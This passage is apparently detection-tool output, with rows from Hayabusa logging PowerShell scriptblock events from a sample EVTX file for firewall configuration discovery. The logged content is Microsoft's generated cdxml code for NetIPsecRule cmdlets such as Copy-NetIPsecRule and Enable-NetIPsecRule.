$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewal",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) 